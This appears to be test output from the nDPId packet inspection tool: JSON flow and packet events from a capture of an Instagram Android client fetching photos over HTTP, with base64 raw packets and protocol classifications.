-00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
-02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAAO9N4sXTDu15V0zXWqS6eeKmgreaCCmgg7uEVJBFpoIqbJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65
+hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="} -02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPVyqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqD
Id1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7440000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"thread_ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1436720950909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950909,"pkt":"QPMIw47hABsv8H60CABFAAWqgMlAAFYGaDQfDVY0wKgAZwBQ42ig4vcaLhm0z4AQADsFTwAAAQEIChPCQpUAA\/8J\/RR\/Qw44auNd5sy65M8X7sSNLvesqLPp\/hWIEgj7u\/c3G33+CGWHr5NjTBvseCa33d9vm54JLq\/16uWtfE8LiAl4wMLDP475fV1R18fJlgWHzmvfo5rv8qseyXDb2HUuXqKoKX0JEHYQ4SCsd7x2l6PL5eytk2f\/kmJp\/iODsxx2N\/N4UQwH1r7vqSLq\/y5DElOXzRARZUzbImejgsz5wOzVgeOngfBrQtGX6fL5DmkthCiZgx4mBvjCvzFR0YP1xM0OXv+CShnIqVrP5zMdqJDyzU483pE+34fsEdDMZT4JhGoy\/98gru4qi0lyXyEksrGabld776ByfJIVVp4RivH8YLNUqtpfCVBnMTiA7j\/sfl7slzSCJaM2S8tAkbhjEusFLl75fI1asIxOiRsWcrVhmx\/PbZlpNd4K8\/v2iJLC1YElBY1y9j56WJc0LPwne+0suiyX3kgj3Fb6y+5RCsQCy2EKLdhWRbyLYVKkL4lX1A\/hBl\/EQkdQU6AhwlzHoU9XC8zrf\/sv+pTGiGgMczA3HQL0c6iXziIlynBHwH6WDIGpFhs4sIl7R4Y0SaCPOZA1lnMfjRJoKCOWKLZc4VEiazWUhaMala+ExIJc2XmtrYy\/iRYyo+LY2ytYUtBbJwRglHwtVOPffxRf4sv1nIag0M0miGXxU6GsLdqvokImfUh+1xnyRB2wekFeanQUhm7KU2GNA\/Wut8I6Yh\/BrGK2ISAtFCkh5uw9+EN15dd79TckDZ5M\/1IXL8vqbu\/hTG\/JfucZfR3dz3L3c+OhdygQW8UzKVOFvvFE3uZQnd322DAH7zC3LRHAXbCjqHBmwf2whhpegjLfm6RfL+z+IzmMokA9e2qfVhZ6xYQdwpjxowXA\/a0hFuEIYBqgg2RBxOTW9B0lNexKZj7L7myCIQt5asMs3OULjIFOSJmLxUIk3Q37w4ymEfVUM4Q7YQrd2Q7D7oXQeE3jsBBmSxiRovqahgnBN4hvIeCZZMLY1uvosfkYR3vNLSiHuKZeam\/RFQJomYqTPcrO3yya\/L8n\/bJvfwlRzHWNuu76VGEBOTSmIQrzPwlvzfa91FS9xmltfjK8v2vivjQ79d9wnDovM7E8heMjng\/L76qTSur9Xu++liqI9lESwcV36\/iMv+UhBAvwlNl9yFOXzTHExcfuKxDjy2WcT\/yjID\/XwdhLUHYsgQ9jzrKZiitJYPrb03G\/4eqDHUUFspftslQp6lFXZbtMgT+PtX+iul7L97VDMHXGdwaI8TzZ6\/jXre8vnY2F+CmIZKNEjnJpMB39UHX\/p7\/3FfZpIUwHcB3IlgFw2RAH5dbcIGzC1nhuJYVIQctqJ04wUFMG9bZhr46HZ73BXAQuUhUW68mxXOEcSUvu6IiD4944qVAoG\/m5vfXCzer8TXXbtxGJy\/lJZWKxmuOzEdM\/69tZAld3d7Oi+E\/\/wSXdP1F9r8RHsvFnMaKa\/Gb3fFq120z5c
fUI5ObITs4O5x1e\/k2SP4T55SQ1l\/\/E7jbfd3y\/W+K4YanQb4PNdLvnwtOUEVU10v172Jve733E93FYrd8\/r7COigUu\/j7zMkQoWBxC6yXxRL8fBFpX1\/jifjboOb9QR4q79l+S7kBZXF3dpMduttP55\/mpWYFflzvfd\/Hx+Ie9ijit30tVfYliZvDoVqX8Iibo18xmX2SURsTLcDlv6t9hYNRdUnFiX1r9e4\/4uD+iVcRBUU8hc0fHv5tu\/ghpv97F5dOxeZj2CiEjpYqtM2N6y9Ex9X2v34njvtqIprtcVwGtsEjAY8n2yd95fX6LnY6678J3vfovd9+pLl7ZMl\/\/3mgopvtAOiqdmdl8m1KgVxW1IDqxnD5Yq+7jVsvs"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1436720950910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720950910,"pkt":"ABsv8H60QPMIw47hCABFAAA0TetAAEAGtojAqABnHw1WNONoAFAuGbTPoOL3GoAQH8w2dwAAAQEICgAD\/xATwkKT"} -02380{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1436720950911,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950911,"pkt":"QPMIw47hABsv8H60CABFAAWqgMpAAFYGaDMfDVY0wKgAZwBQ42ig4vyQLhm0z4AYADulrQAAAQEIChPCQpYAA\/8JIuSEmFKcHvUO79IuA4AtgLK1ooHfe\/xvCx6EanjcjDye5qfYfg99btIFMlfpEyS0+WXx48YQQIBKyWOQayb5WbhMWSz8Ru7MV\/a5RJtywzl84iv9BLl6PdqXz3kxPZm4yY8HdjILE3vdfyWVN0pVFaKK+f+Osc32N80bLx0naY6\/StT9w4Neeouf2Tn\/vkhhHb5a5vAV9Sx5efQ\/Fatqq174n5ea7v9ir3vf4yK3Pnlx3v3fywdfv\/ld3jdWI6CQY9xByO962aeABxBaD0Ff8vq65YOluUkGW\/xG5p7nyyq1NumgVeaWXPx2O3qpBCTyam4Mj9KNa9CLu77T788mzfZZLswHVfevJGWxpG6er55a4je67Jde+KzsbHfq771q7M2+z\/WWJw+2E3Gv8+Ffd+tBC77nzd2bXmu\/clj6qf9o8rFbG7XiKrvvv6XxVyXfvsflY+OxHlh7gk3Z3+CHdjx7fieVi8bxm781fQKvN8eNlagx6Pt3\/NOSAfXLBsZ085Sli5c\/HVLg4fEITYcZuYfT1VtMLoUR\/it2aocyhvwSZMTvD5t065r2N7JUsZycS8vq283r4S3bSl8\/xBhG2Ci5YyWnWnN8pxV7z+JfURJd7rip6XefL+Ju6
T2Uxe8n5uUueW8j7FWxyhWWeGt2YWoIb6BgT6P7uCHnx\/HwXcNPzZiXBYPY6liIwioP5BO9O7zdXvrl6Ju71WJu93dF9e+W764JLl\/1aJkh+a8yX4S4lMe7dI+73eX7WiDQUaZve75ZfLkLUJX2tpOX0s4hxEi8nbq2h\/\/mvflq9RBfYRrfTdMUcVv5e78i9rwQyT\/Sl\/1zQY9T8g\/Uty51S6PL8o6JLB8VrQkT8ugJnmu83Eyez2e5Qy1+W7Aw4JHINbEb3Lj395YP7YvjhcMBXfvXJ44Z+Ixmnuj5fXvqryZ8aIvNfJRrTESolEZ4VaoKtE96vFFfwld9u321frxC3vvk10K23e7KuXiuSPeX78kEfFYr7eXpJxFpezOY6TshceqnnmzDJNaHyWEjeK+xtg7siFQxNUarW6raVTT\/fwlt3m1+qIhVuJsRCxFdbFXtQf9\/RdIuTCv1R7IUVly5mtgVW\/5h5d378ta7e\/5QkWm71LXLL\/Y\/yuCATBPFbu75ZM1tF4Xr2urFPeZ1jp6PYqu0ysRtkUSKOnvSvJ9F0HEq\/Rr4RDbTxd+7uU\/Q0X5NSa4riJq7\/YqaIUW4dNr2MWX30vRqr09mqvna6y\/VdiohYPHuWzpM\/5V791hHspd591pkzSvTJiOetcEmlGTx05fm5r+E5WPIYg3+Ld5OiDJCb38Xd9ysF92RKCKwntddXfaT3LP\/4K7yaDr4HbV6D7vh8Ru7u\/ShH0gWZxKK93e\/u7nhshKX\/8u99ZHz6WcFOZh7FbiudjfLamk58fUJd3H2j6sTr\/E4xQhYhPxokXSHH53b6EIn4I8kGvoiAAQAAAAAAACAYAavAAAAAgECXIEAAAAAAAAAAAAAAAACAAWcAAAAZwAAAAUAAQABAAAAAIBgBrAAAAACAQJcAQAAAAAAAAAAAAAAAAIABZwAAABnAAAFoQABAAEAAAAAgGAGsQAAAAIBAlwBAAAAAAAAAAAAAAAAAgAFnAAAAGcAAAs9AAEAAQAAAACA4AayAAAAAgECXEEAAAAAAAAAAAAAAAACAAFNAAAAZwAAENkAAQABARggBwEYIAcAABVgQZrjwgqFiDcfxdYWFjNTGhc\/+kWorCzCP06aQacK5fU3p2bDv4QjGkzRtJEnNbVPk\/10ykQi0ZJ4s6VFQ2Ko59C0bD2u1KUtTyS\/\/DlRe1HhoMlOd6CAkkRYQkwPPOx2Ho6SCe9GzaPNROS+"} -00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}} 
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952553,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720952553,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952553,"pkt":"QPMIw47hABsv8H60CABFAAW+RXVAADMGTWwCFuwzwKgAZwBQrHcqB5rC6nVWeIAQAeYA6gAAAQEICmBlKDgAA\/+vNN9ULewTHBOFuxeelHDOvSnlSV1MyHTuCPSU99J+Rb8TuXzL6L8kVMT9JeX\/AEeHJMKvc8yfZQDY5nhAsWaIx3cLbY2ubZRDNurbaUASgAZ45AKigq45hruCoLni5pLmg59eiPd\/MiN87txVNMyFgkWsWfkcvPvLq3ncGqOJteWDTNpm8JnDNe\/V0S2KHy+GaSkVk8YYmWOQdL4xuwexnBqduXqVc8IuuI9MY+Zt8cnTPcsfLLIlpNfPzE+aRdsInsLztgb98N0mNzOHWHNTZrWKQPr9F5EE8pK7KRl773oe+7TTr1byuTp17xSTo5toqt17OaKtyATyBsMufY15yTPDfHSZYsAADIDSioIAAAHiqKF1TXzn1tX21U6idxttVoiynCqd8u3uesClb\/XTWQXOtPYUXP50lMJRzX9QM7C64zEeROD4ZaaRjli0mWIjfY1adjPenj65KGzqNXJTVghI+6I9UuSYsusH3FlxFno1c9JW3qbWRHfo32lBRAAGeChkqKC5IoYXnRl6Z3L5dCnLn26mSNOSOlqcea5o+UReR652+3d2\/Dab0zb9PXGqPSSLVDbNYRN6MtmpYbJEJLFdJ2RaURdiZY5h0OrU5h7IeY888nVsXnwm4oxv7JWfA68vLc8ehxYrmuOvDGouaBzaCTVP8+zXrnlnrxCWO9ezKKfpVjom7FpO6KTzNl60JdWhqz19c1yubV3UpRimqVV2W9Iuz4HPYBS04ZbGvOuvLXvjiZYsyxAFADSAAAIAHiqKCLcMvDzel9taKZLs5gp0t2Sh58L9ypUAXrhU0aeiss785JfFQgziXCyntnoKqRxzXlrlhljpCKihlu1P7THj6681RUYywmYQzKyhFbllawrlLFUK21TYahBMm4bB0c\/Q0qorQAApkAqZAqooYd7fNpcf2zJkmmfqN4IOKohvY2dlqWGThFbWF\/iVS78WnnJ2uDHuZI98fVGcac2Zm9mcm1UZY5ht7uDaF69Ec7stO3DjzT4G5waWu1vkbTUs3N04NR5d+uk9NE0xVVXqfWMDHPBz3TyJ2pj1SeiHvpcNbNaNfVk2d++zGVKltAVHjbncFMYehMEedktrQOr+f0lWrmtUm+5kDyFpIAAACABpAAAEADxUAvSVxiQ0ufh6dafDwdvPJvem8y03645umpEvJ0dXO8bOVZrlo6+6HRHb0ou72TKnrj5KPN7\/AOgKGio1hlhcLnqyF3+tvLXsSbkfin2t4tioTO4NYFQ\/cjnql8XXv1hza9+0Ud7jZRwM7yzJxDp5um5UBpRFBRFDJUAyXHIMLhp62c7n0OsJjy0iGfHrFKd3PzhU8hjD\/pFzODc\/Y6udSW9S1xmy97TUsc6rydtdS82Etsi8jjdrKKSuKgmeOTOnu4nJHsh6YHzk6+ZUwTisdkMdqJMzvOrXOshOkK636OrSLZYJJHZcArm2apudeK4tWc27cstemRx+TikdR37SEPju+kLssw2Gc1wOvJ2hIdaYk1zq07
Iu2KUuuldIaeHl165wzJM2tQDAAEFA0ACABgAIKiLtm1f2FaZdGxIrg19HJLzj8n4Ypnc+B3T5H9i6KUpcY+86xxUVeVESMl8UPe1Kc82\/VTk3j\/1J5ak58ckqUUUN\/rfyR6eHcXir2n4sx0h9l1nO6iWmGyLxxNiNJu0g3Ybk0hqbHRqCIdPN0XOQitAAKqALljkCrjkGF2Uncud2zD5hCufWAuzR3tSLQmaqnX6OSXbK53hgkuOsgpG7qQpZRqSR+oidlVpZdTrxXdIxxKXxG1ojMpizEzxzZ0OrW7I9gvrG+cnXo1beEccjsojNZyrk6C5qrW4NVKD9vH1VFwxWVxccbqS2Yg5iCSbQN4k01rSK6ZNFZW1N6VuWn84="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952553,"pkt":"ABsv8H60QPMIw47hCABFAAA0quZAAEAG4ITAqABnAhbsM6x3AFDqdVZ4KgegTIAQAtavfwAAAQEICgAD\/7RgZSg4"} -02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1436720952555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952555,"pkt":"QPMIw47hABsv8H60CABFAAW+RXZAADMGTWsCFuwzwKgAZwBQrHcqB6BM6nVWeIAQAeZ8mQAAAQEICmBlKDgAA\/+vtV20fc9mrp1dM1zdmjppSPVtJK34O3VnVq0beVF65xNDXtnFMscw0gMAAAA0IoJBUBRFARUHcs5g82pbGbtawVs6OSKR1bUyvV0dTgqje3NxuXVMt1wlAegfPgme8KPvNkyz2Nzpho206rca8VQBcVDdd9H2q16p8Xe1\/FGG0PnMFm95yjbzbc7y6uXqTNGzWHDjlr1zbmh3aAiPRz9FJQBKIrBUUFyxyAyxUMbq